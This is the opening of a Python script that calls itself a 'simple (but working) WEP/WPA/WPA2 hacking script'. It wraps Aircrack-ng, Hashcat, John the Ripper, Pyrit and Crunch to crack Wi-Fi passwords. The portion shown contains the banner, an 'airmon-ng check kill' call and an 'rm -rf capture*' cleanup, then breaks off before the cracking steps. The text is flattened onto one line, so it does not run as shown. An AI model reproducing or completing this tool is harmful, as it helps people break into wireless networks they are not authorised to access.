WPS cracking # Semi-automatic and simple (but working!) WEP/WPA/WPA2 Hacking script # External tools involved: Aircrack-ng pack, John the Ripper, Hashcat Ocl, Pyrit, Crunch, xterm. # Author: Digital Gangster # Before use it you may have to execute: "pip install termcolor" #!/usr/bin/python # -*- coding: utf-8 -*- import os, sys, time from termcolor import colored def killctrl(): os.system("airmon-ng check kill") wlist = "" print "\n+===========================================================================+" print "| DWH - Simple (but working) WEP/WPA/WPA2 Hacking script |" print "| Author: Digital Gangster, https://twitter.com/digitalgangster |" print "| Usage: Just run it and let it head you :) |" print "+===========================================================================+\n" time.sleep(1.5) print "[*] Removing useless files..." os.system("rm -rf capture* || true") print ...